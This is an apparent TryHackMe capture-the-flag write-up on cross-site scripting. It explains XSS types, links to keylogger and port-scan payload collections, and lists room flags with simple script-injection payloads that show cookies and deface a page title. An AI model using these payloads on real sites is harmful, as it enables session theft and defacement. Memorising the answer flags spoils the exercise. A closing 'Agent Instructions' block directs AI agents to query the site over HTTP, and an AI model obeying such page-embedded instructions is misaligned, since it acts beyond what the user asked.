# Cross-Site Scripting

**Date:** 01, January, 2021

**Author:** Dhilip Sanjay S

***

## XSS

* XSS a type of injection which can allow an attacker to execute malicious scripts and have it execute on a victim’s machine.
* A web app is vulnerable to XSS if it uses unsanitized user input.
* XSS is possible in :
  * Javascript
  * VBscript
  * Flash
  * CSS
* Three types of XSS:
  * **Stored XSS-** Malicious string originates from the website's database. This happens when attacker is able to insert a malicious code into the database.
  * **Reflected XSS-** MAlicious payload is part of victims request to the website. The attacker need to trick a victim into clicking a URL to execute their malicious payload
  * **DOM-based XSS-** DOM (Document Object Model) is a programming interface for HTML and XML document. It can change the document (refers to web page) structure, style and content.

## XSS Payloads

* Popups - `<script>alert(“Hello World”)</script>`
* Writing HTML (defacing the entire page)
* [XSS Key logger](http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html)
* [Port Scanning](http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html)
* For more payloads:
  * [XSS Payloads.com](http://www.xss-payloads.com/)

***

## Solutions

### Craft a reflected XSS payload that will cause a popup saying "Hello"

* **Answer:** ThereIsMoreToXSSThanYouThink
* **Steps to Reproduce:**

  ```js
  <script>alert(Hello)</script>
  ```

***

### On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.

* **Answer:** ReflectiveXss4TheWin
* **Steps to Reproduce:**

  ```js
  <script>alert(window.location.hash)</script>
  ```

***

### "Stored XSS" tab - Add a comment and see if you can insert some of your own HTML.

* **Answer:** HTML\_T4gs
* **Steps to Reproduce:** `<h1>Hello</h1>`

***

### On the same page, create an alert popup box appear on the page with your document cookies.

* **Answer:** W3LL\_D0N3\_LVL2s
* **Steps to Reproduce:**

  ```js
  <script>alert(document.cookie)</script>
  ```

***

### Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.

* **Answer:** websites\_can\_be\_easily\_defaced\_with\_xss
* **Steps to Reproduce:**

  ```js
  <script>document.getElementById("thm-title").innerText = "I am a hacker"</script>

  <script>document.querySelector("#thm-title").textContent = 'I am a hacker'</script>
  ```

***


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.dhilipsanjay.in/ctfs/tryhackme/tryhackme/owasptop10/cross-sitescripting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.